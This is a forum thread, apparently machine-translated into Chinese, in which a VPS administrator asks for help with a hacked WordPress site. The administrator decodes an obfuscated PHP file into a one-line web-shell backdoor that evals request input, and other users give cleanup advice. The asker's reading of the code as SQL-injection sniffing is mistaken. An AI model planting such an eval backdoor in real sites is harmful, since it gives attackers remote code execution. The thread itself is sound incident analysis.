Php WordPress黑客尝试

我运行了一个VPS，为小客户网站安装了几十个WordPress

我刚刚注意到一个站点有一个名为“pnxnfup.php”的php脚本，其中包含一个基于64个字母数字字符的加载

在网站的根目录中也有很多没有扩展名的文件——只是随机的alphanum字符串——这些文件看起来像是记录了IP地址——我猜这些是访客IP地址（我的在里面）

有人知道这可能是什么类型的利用吗

更新：12月18日

好的，我设法解码了pnxnfup.php的内容

当我解码原始php文件时，它包含更多的base64编码内容，其中夹杂着随机胡言乱语的php注释，在解码文件的其余部分之前，我必须手动去除这些注释

一旦我解码了它，我发现更多的base64编码字符串带有更多乱七八糟的php注释。一旦我重复了剥离和解码过程（呸！），我就只剩下这个：

if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));

---

我大致了解这段代码在做什么（嗅探带有asc参数的请求，这些参数将指示一个可以作为sql注入目标的url），但我不认为这对黑客本身有什么价值。我猜黑客一定渗透得更深了，我还遗漏了什么？

如果你检查一下

---

但到底是什么很难说，如果我是你，我会设置一个沙盒环境，并对其进行一些操作，以了解黑客的目的。

可能这个网站使用的是“免费”主题。其中大多数都有收集密码和登录信息的代码，用于在网站上添加恶意软件脚本。你有网站的备份吗？我强烈建议您清理所有文件，然后更改您的FTP密码（和登录，如果可能的话），然后重新上传所有内容

---

顺便说一句，也许Sucuri可以帮你找到一些受感染的文件：

听起来像是一个损坏的shell输出重定向尝试。尝试吗？看起来你有pwn3d。也许你应该雇佣一位专业人士。@Rook-感谢你的宝贵贡献：/Hey Bruno-不使用免费主题-这是一个从零开始编写的自定义主题-我知道远离“免费”恶意软件泛滥的主题-但感谢seucuri提示！